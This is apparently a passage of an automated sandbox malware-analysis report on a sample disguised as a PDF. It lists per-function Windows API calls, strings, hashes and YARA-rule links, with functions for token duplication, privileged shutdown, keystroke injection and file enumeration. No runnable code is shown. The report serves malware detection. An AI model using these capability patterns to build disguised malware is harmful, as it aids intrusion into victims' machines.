                              • Instruction Fuzzy Hash: 6DE0BF7494020D9FDB00EFA4D94969E7FB4EF04301F104561FD01A2280D63099508A62

                              Non-executed Functions

                              Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                              • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                              • GetKeyState.USER32(00000011), ref: 0047C92D
                              • GetKeyState.USER32(00000009), ref: 0047C936
                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                              • GetKeyState.USER32(00000010), ref: 0047C953
                              • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                              • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                              • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                              • _wcsncpy.LIBCMT ref: 0047CA29
                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                              • SendMessageW.USER32 ref: 0047CA7F
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                              • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                              • ImageList_SetDragCursorImage.COMCTL32(00938D90,00000000,00000000,00000000), ref: 0047CB9B
                              • ImageList_BeginDrag.COMCTL32(00938D90,00000000,000000F8,000000F0), ref: 0047CBAC
                              • SetCapture.USER32(?), ref: 0047CBB6
                              • ClientToScreen.USER32(?,?), ref: 0047CC17
                              • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                              • ReleaseCapture.USER32 ref: 0047CC3A
                              • GetCursorPos.USER32(?), ref: 0047CC72
                              • ScreenToClient.USER32(?,?), ref: 0047CC80
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                              • SendMessageW.USER32 ref: 0047CD12
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                              • SendMessageW.USER32 ref: 0047CD80
                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                              • GetCursorPos.USER32(?), ref: 0047CDC8
                              • ScreenToClient.USER32(?,?), ref: 0047CDD6
                              • GetParent.USER32(00000000), ref: 0047CDF7
                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                              • SendMessageW.USER32 ref: 0047CE93
                              • ClientToScreen.USER32(?,?), ref: 0047CEEE
                              • TrackPopupMenuEx.USER32(?,00000000,?,?,01731B70,00000000,?,?,?,?), ref: 0047CF1C
                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                              • SendMessageW.USER32 ref: 0047CF6B
                              • ClientToScreen.USER32(?,?), ref: 0047CFB5
                              • TrackPopupMenuEx.USER32(?,00000080,?,?,01731B70,00000000,?,?,?,?), ref: 0047CFE6
                              • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                              • String ID: @GUI_DRAGID$F
                              • API String ID: 3100379633-4164748364
                              • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                              • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                              • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                              Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetForegroundWindow.USER32 ref: 00434420
                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                              • IsIconic.USER32(?), ref: 0043444F
                              • ShowWindow.USER32(?,00000009), ref: 0043445C
                              • SetForegroundWindow.USER32(?), ref: 0043446A
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                              • GetCurrentThreadId.KERNEL32 ref: 00434485
                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                              • SetForegroundWindow.USER32(00000000), ref: 004344B7
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                              • keybd_event.USER32(00000012,00000000), ref: 004344CF
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                              • keybd_event.USER32(00000012,00000000), ref: 004344E6
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                              • keybd_event.USER32(00000012,00000000), ref: 004344FD
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                              • keybd_event.USER32(00000012,00000000), ref: 00434514
                              • SetForegroundWindow.USER32(00000000), ref: 0043451E
                              • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                              • String ID: Shell_TrayWnd
                              • API String ID: 2889586943-2988720461
                              • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                              • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                              • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                              Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                              Download Yara Rule
                              APIs
                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                              • CloseHandle.KERNEL32(?), ref: 004463A0
                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                              • GetProcessWindowStation.USER32 ref: 004463D1
                              • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                              • _wcslen.LIBCMT ref: 00446498
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _wcsncpy.LIBCMT ref: 004464C0
                              • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                              • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                              • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                              • UnloadUserProfile.USERENV(?,?), ref: 00446555
                              • CloseWindowStation.USER32(00000000), ref: 0044656C
                              • CloseDesktop.USER32(?), ref: 0044657A
                              • SetProcessWindowStation.USER32(?), ref: 00446588
                              • CloseHandle.KERNEL32(?), ref: 00446592
                              • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                              • String ID: $@OH$default$winsta0
                              • API String ID: 3324942560-3791954436
                              • Opcode ID: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                              • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                              • Opcode Fuzzy Hash: 52a5cbb7690f64740f818e59e599c99b846dd20d3ab12822ed89c3a639b05c79
                              • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                              Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                              • FindClose.KERNEL32(00000000), ref: 00478924
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                              • __swprintf.LIBCMT ref: 004789D3
                              • __swprintf.LIBCMT ref: 00478A1D
                              • __swprintf.LIBCMT ref: 00478A4B
                              • __swprintf.LIBCMT ref: 00478A79
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                              • __swprintf.LIBCMT ref: 00478AA7
                              • __swprintf.LIBCMT ref: 00478AD5
                              • __swprintf.LIBCMT ref: 00478B03
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                              • API String ID: 999945258-2428617273
                              • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                              • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                              • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                              Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                              • __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                              • _wcscpy.LIBCMT ref: 004034A7
                              • _wcscat.LIBCMT ref: 004034BC
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                              • _wcscpy.LIBCMT ref: 004035A0
                              • _wcslen.LIBCMT ref: 00403623
                              • _wcslen.LIBCMT ref: 0040367D
                              Strings
                              • Error opening the file, xrefs: 00428231
                              • Unterminated string, xrefs: 00428348
                              • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                              • _, xrefs: 0040371C
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                              • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                              • API String ID: 3393021363-188983378
                              • Opcode ID: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                              • Opcode Fuzzy Hash: 78f48f825e219418bf9b5df19dfe877f1b72b905c01bd98d046c3c676a5c4f44
                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                              Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                              • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                              • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                              • FindClose.KERNEL32(00000000), ref: 00431B20
                              • FindClose.KERNEL32(00000000), ref: 00431B34
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                              • FindClose.KERNEL32(00000000), ref: 00431BCD
                              • FindClose.KERNEL32(00000000), ref: 00431BDB
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                              • String ID: *.*
                              • API String ID: 1409584000-438819550
                              • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                              • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                              • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                              Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                              • __swprintf.LIBCMT ref: 00431C2E
                              • _wcslen.LIBCMT ref: 00431C3A
                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                              • String ID: :$\$\??\%s
                              • API String ID: 2192556992-3457252023
                              • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                              • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                              • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                              Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetLocalTime.KERNEL32(?), ref: 004722A2
                              • __swprintf.LIBCMT ref: 004722B9
                              • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                              • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                              • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                              • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                              • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                              • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                              • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                              • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: FolderPath$LocalTime__swprintf
                              • String ID: %.3d
                              • API String ID: 3337348382-986655627
                              • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                              • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                              • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                              Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                              • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                              • FindClose.KERNEL32(00000000), ref: 0044291C
                              • FindClose.KERNEL32(00000000), ref: 00442930
                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                              • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                              • FindClose.KERNEL32(00000000), ref: 004429D4
                                • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                              • FindClose.KERNEL32(00000000), ref: 004429E2
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                              • String ID: *.*
                              • API String ID: 2640511053-438819550
                              • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                              • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                              • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                              Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                              • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                              • GetLastError.KERNEL32 ref: 00433414
                              • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                              • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                              • String ID: SeShutdownPrivilege
                              • API String ID: 2938487562-3733053543
                              • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                              • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                              • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                              Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
